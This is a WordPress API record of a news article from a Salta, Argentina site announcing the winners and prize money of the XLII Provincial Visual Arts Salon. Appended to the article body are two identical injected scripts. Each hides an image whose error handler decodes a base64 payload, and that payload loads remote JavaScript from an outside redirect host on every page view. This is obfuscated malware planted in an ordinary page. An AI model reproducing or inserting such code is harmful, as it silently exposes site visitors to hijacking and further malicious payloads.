{"id":1964,"date":"2022-12-16T10:36:55","date_gmt":"2022-12-16T13:36:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1964"},"modified":"2025-08-14T00:27:41","modified_gmt":"2025-08-14T03:27:41","slug":"se-dieron-a-conocer-los-ganadores-del-xlii-salon-provincial-de-artes-visuales-en-el-museo-de-bellas-artes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1964","title":{"rendered":"Se dieron a conocer los ganadores del XLII Sal\u00f3n Provincial de Artes Visuales en el Museo de Bellas Artes"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#513c05\"><em>Este s\u00e1bado en el marco de la Noche de los Museos, se oficializar\u00e1 la entrega a los ganadores del certamen en Belgrano 992, a partir de las 18.<\/em><\/h4>\n\n\n\n<p>El Sal\u00f3n Provincial de Artes Visuales recoge cada a\u00f1o, en diferentes especialidades, una muestra del patrimonio art\u00edstico de la provincia, brindando un panorama de la producci\u00f3n cultural salte\u00f1a y generando un espacio en el que dialogan artistas n\u00f3veles y consagrados.<\/p>\n\n\n\n<p>En esta oportunidad, la entrega de los premios se realizar\u00e1 el s\u00e1bado 17 de diciembre, a partir de las 18 H en el Museo de Bellas Artes, en ocasi\u00f3n de la Noche de los Museos, parte del ciclo Salta de Fiesta.<\/p>\n\n\n\n<p>El Gran Premio de Honor 2.022 es para el artista Fabi\u00e1n Nanni, en la disciplina art\u00edstica \u201cEscultura\u201d, obra que se podr\u00e1 ver exhibida en Belgrano 992, desde las 10 hasta las 20.<\/p>\n\n\n\n<p>A continuaci\u00f3n, publicamos el listado completo con cada una de las obras seleccionadas de acuerdo a la categor\u00eda de participaci\u00f3n:<\/p>\n\n\n\n<p>Premio en Especialidad ESCULTURA<\/p>\n\n\n\n<p>&nbsp;1\u00ba Premio Adquisici\u00f3n<\/p>\n\n\n\n<p>IVANA SALFITY<\/p>\n\n\n\n<p>Menciones<\/p>\n\n\n\n<p>ANDREA LILIAN RODRIGUEZ<\/p>\n\n\n\n<p>CECILIA LUTUFYAN<\/p>\n\n\n\n<p>CLARA JOHNSTON<\/p>\n\n\n\n<p>Premio en Especialidad GRABADO<\/p>\n\n\n\n<p>1\u00b0 Premio Adquisici\u00f3n<\/p>\n\n\n\n<p>LAUTARO DO CAMPO<\/p>\n\n\n\n<p>Menciones<\/p>\n\n\n\n<p>LAUTARO GASTON ROJAS<\/p>\n\n\n\n<p>Premio en Especialidad INSTALACIONES Y MEDIOS ALTERNATIVOS<\/p>\n\n\n\n<p>1\u00ba Premio Adquisici\u00f3n<\/p>\n\n\n\n<p>SOLEDAD S\u00c1NCHEZ GOLDAR<\/p>\n\n\n\n<p>Menciones<\/p>\n\n\n\n<p>SOFIA LOPEZ VI\u00d1ALS<\/p>\n\n\n\n<p>PREMIO EST\u00cdMULO para J\u00f3venes Artistas 1\u00ba Premio<\/p>\n\n\n\n<p>FLORENCIA SILVERA<\/p>\n\n\n\n<p>Menciones<\/p>\n\n\n\n<p>JESSICA PEREZ<\/p>\n\n\n\n<p>ROCIO BARZOLA<\/p>\n\n\n\n<p>Es importante agregar que el Museo, como anfitri\u00f3n de la muestra cada a\u00f1o, propuso en esta edici\u00f3n que el p\u00fablico vote a su obra favorita. Para tal fin, se habilit\u00f3 una urna donde los visitantes expresaron sus preferencias. Este premio, que ser\u00e1 el Premio del P\u00fablico, ser\u00e1 entregado tambi\u00e9n el s\u00e1bado 17.<\/p>\n\n\n\n<p>Cada ganador del Primer Premio Adquisici\u00f3n recibir\u00e1 $160.000, del premio est\u00edmulo para j\u00f3venes recibir\u00e1 $50.000 y el Gran Premio $200.000. La inauguraci\u00f3n del XLII Sal\u00f3n de Artes Visuales se realizar\u00e1 el 17 de diciembre en el marco de la Noche de los Museos.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-dieron-a-conocer-los-ganadores-del-xlii-salon-provincial-de-artes-visuales-en-el-museo-de-bellas-artes-86836\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este s\u00e1bado en el marco de la Noche de los Museos, se oficializar\u00e1 la entrega a los ganadores del certamen en Belgrano 992, a partir de las 18. El Sal\u00f3n Provincial de Artes Visuales recoge cada a\u00f1o, en diferentes especialidades, una muestra del patrimonio art\u00edstico de la provincia, brindando un panorama de la producci\u00f3n cultural [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1965,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-1964","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1964"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1964"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1964\/revisions"}],"predecessor-version":[{"id":7239,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1964\/revisions\/7239"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1965"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1964"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1964"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1964"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}